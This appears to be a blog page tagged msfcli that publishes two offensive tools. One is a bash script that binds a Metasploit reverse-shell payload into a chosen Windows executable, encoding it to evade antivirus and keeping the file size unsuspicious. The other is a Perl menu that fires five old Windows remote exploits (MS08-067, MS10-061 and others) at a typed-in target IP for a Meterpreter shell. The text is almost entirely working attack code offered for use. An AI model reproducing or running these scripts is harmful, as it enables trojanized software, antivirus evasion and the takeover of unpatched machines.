OPEXXX

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

#!/bin/bash

# counts to mangle the trojan to avoid av detect

# keep low we want close to normal filesize for user not to suspect anything

count=15

if [[ -z $3 ]];then

echo “usage $(basename $0) <revservip> <revservport> <binary filename>”

echo “to attach to filename_out.exe”

echo “doesn’t work well for PU binaries, they say”

exit 0

else

ip=$1

port=$2

bin=$3

tdir=$(dirname $bin)

echo “encoding ${bin}-out.exe , mangling $count times”

fi

msfpayload windows/shell/reverse_tcp LHOST=${ip} LPORT=${port} R | \

msfencode -x “${tdir}/${bin}” -t exe -e x86/shikata_ga_nai -o “${tdir}/${bin%%.*}-out.exe” -c $count

# msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=31337 E

Jun 08

F*ck MS Exploit Menu

print “##############################\n”;

print “# #\n”;

print “# ##### # # ## # # #\n”;

print “# # # # # # # # #\n”;

print “# #### # # # ## #\n”;

print “# # # # # # # # #\n”;

print “# # ### ## # # #\n”;

print “# #\n”;

print “# # # # ## ### ## #\n”;

print “# # # ## # # # # # # # #\n”;

print “# # # # # # ### # # #\n”;

print “# # # # # # # # # # #\n”;

print “# # # # ## # # ## #\n”;

print “# #\n”;

print “# ## ## ##### ###### #\n”;

print “# # # # # # # #\n”;

print “# # # # #### # #\n”;

print “# # # # # # # #\n”;

print “# ## ## # # #\n”;

print “# #\n”;

print “##############################\n”;

system(“sleep 3”);

system(“clear”);

SploitMenu:

print ” ##################\n”;

print ” # Exploit Menu #\n”;

print ” ##################\n”;

print ” 1 - Run MS-08-067 \n”;

print ” 2 - Run MS-10-061 \n”;

print ” 3 - Run MS-03-026 \n”;

print ” 4 - Run MS-04-031 \n”;

print ” 5 - Run MS-07-029 \n”;

print ” 6 - Exit \n”;

print “—————————-\n”;

print “\n\nCh0mpy-Pwn>”;

$choice =<STDIN> ;

if ($choice==1){&ms08067};

if ($choice==2){&ms10061};

if ($choice==3){&dcom};

if ($choice==4){&netdde};

if ($choice==5){&zonename};

if ($choice==6){&exit};

sub ms08067

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-08-067 on them and gives you a Meterpreter shell \n”;

print ” Conficker Style liek a baws \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms08_067_netapi RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub ms10061

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-10-061 on them and gives you a Meterpreter shell \n”;

print ” Owning liek a Stuxnet \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms10_061_spoolss RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub dcom

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-03-026 on them and gives you a Meterpreter shell \n”;

print ” Dcom vulns… Patch plz lol \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub netdde

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-04-031 on them and gives you a Meterpreter shell \n”;

print ” moar old vulns… Patch plz lol \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/smb/ms04_031_netdde RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub zonename

{

print ” The only input you need is the targets IP address \n”;

print ” This simply runs MS-07-029 on them and gives you a Meterpreter shell \n”;

print ” No idea how this one works bro \n”;

print “\n\nTarget>”;

my $target =<STDIN> ;

system(“msfcli windows/dcerpc/ms07_029_msdns_zonename RHOST=$target PAYLOAD=windows/meterpreter/bind_tcp -E”);

}

goto SploitMenu;

sub exit

{

exit

}

OPEXXX

Showing posts tagged msfcli

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

F*ck MS Exploit Menu